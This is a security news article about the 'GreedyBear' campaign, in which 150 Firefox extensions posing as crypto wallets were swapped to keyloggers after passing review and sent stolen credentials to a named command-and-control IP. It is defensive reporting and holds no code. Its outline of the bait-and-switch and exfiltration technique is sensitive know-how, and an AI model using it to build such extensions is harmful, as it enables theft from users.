GreedyBear Unleashed: How 150 Malicious Firefox Extensions Stole $1M in Crypto Using AI-Powered Evasion

In a stark reminder of the fragility of browser extension security, Mozilla's Firefox add-on store was recently infiltrated by 150 malicious extensions designed to drain cryptocurrency wallets. Dubbed 'GreedyBear' by researchers at Koi Security, the campaign netted an estimated $1 million from unsuspecting victims before being dismantled. The operation’s sophistication—fueled by AI-generated code—reveals how cybercriminals are increasingly automating attacks to exploit trust in legitimate software repositories.

The Bait-and-Switch Tactics of GreedyBear

GreedyBear's success hinged on a deceptive two-phase approach. Attackers first uploaded extensions impersonating trusted wallets like MetaMask, TronLink, and Rabby in a benign form to pass Mozilla's initial review process. These versions accumulated fake positive reviews to build credibility. Once established, the publishers silently stripped out branding and injected malicious code, transforming them into crypto-draining tools.

An extension in its initial benign state, later weaponized to steal credentials. (Source: Koi Security)

The malicious code functioned as a keylogger, capturing input from form fields within the extension's popup interface. "The weaponized extensions capture wallet credentials directly from user input fields and exfiltrate them to a remote server controlled by the group," explained Tuval Admoni of Koi Security. "During initialization, they also transmit the victim’s external IP address, likely for tracking or targeting purposes." This data was sent to a command-and-control (C2) server at IP address 185.208.156.66, which coordinated the entire operation.

A Broader Ecosystem of Deception

GreedyBear extended beyond Firefox, with ties to Russian-speaking pirated software sites distributing 500 distinct malware variants, including info-stealers like LummaStealer and ransomware. These sites hosted fake services mimicking Trezor and Jupiter Wallet, creating a multi-pronged attack funnel.

A fraudulent Jupiter Wallet site used to lure victims into downloading malware. (Source: Koi Security)

Koi Security's report notes "clear signs of AI-generated artifacts" in the campaign's code, enabling attackers to rapidly iterate payloads and evade detection. This AI-driven scalability allowed GreedyBear to rebound quickly after takedowns—a concerning evolution from last month's attack involving 40 fake extensions on Firefox. Despite Mozilla deploying a crypto-drainer detection system in June 2025, the store's vetting process proved insufficient against such adaptable threats. Worryingly, evidence suggests the group is testing expansions to the Chrome Web Store, with a malicious 'Filecoin Wallet' extension already spotted using identical theft logic.

Why This Matters for Developers and Security Teams

The GreedyBear campaign underscores critical vulnerabilities in the software supply chain. Browser extensions, often granted high-level permissions, represent a low-risk, high-reward vector for attackers. As Koi Security emphasizes, AI lowers barriers for cybercriminals, enabling them to generate convincing fake extensions at scale and outpace traditional security reviews. For developers, this highlights the urgency of zero-trust principles—even in curated marketplaces. Mozilla acted swiftly to remove the extensions after Koi's disclosure, but the incident exposes gaps in proactive threat hunting.

To mitigate risks, always verify extensions directly via official project websites, scrutinize publisher details, and prioritize user reviews from multiple sources. As AI continues to democratize cybercrime, the industry must prioritize automated, behavior-based detection over static reviews. In this landscape, vigilance isn't just best practice—it's the last line of defense.

Source: BleepingComputer, with analysis from Koi Security.